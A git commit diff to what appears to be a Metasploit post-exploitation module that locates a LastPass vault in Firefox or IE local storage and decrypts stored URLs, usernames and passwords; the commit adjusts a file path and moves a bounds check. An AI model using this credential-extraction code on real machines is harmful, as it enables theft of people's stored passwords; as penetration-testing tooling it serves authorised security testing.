Undo path and move the out of bound check
This commit is contained in:
parent
d515e4db64
commit
6fb27a3da9
|
@ -404,7 +404,7 @@ class Metasploit3 < Msf::Post
|
|||
if browser.match(/Firefox|IE/)
|
||||
if browser == "Firefox"
|
||||
iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr"
|
||||
vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml"
|
||||
vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml"
|
||||
else # IE
|
||||
iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr"
|
||||
vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml"
|
||||
|
@ -709,17 +709,17 @@ class Metasploit3 < Msf::Post
|
|||
labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"]
|
||||
vault_data = []
|
||||
for label in labels
|
||||
if chunk[pointer..pointer + 3].nil?
|
||||
# Out of bound read
|
||||
return nil
|
||||
end
|
||||
|
||||
length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
|
||||
encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1]
|
||||
label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*")
|
||||
decrypted_data = "" if decrypted_data.nil?
|
||||
vault_data << decrypted_data if (label == "url" || label == "username" || label == "password")
|
||||
pointer = pointer + 4 + length
|
||||
|
||||
if chunk[pointer..pointer + 3].nil?
|
||||
# Out of bound read
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes
|
||||
|
|
Loading…
Reference in New Issue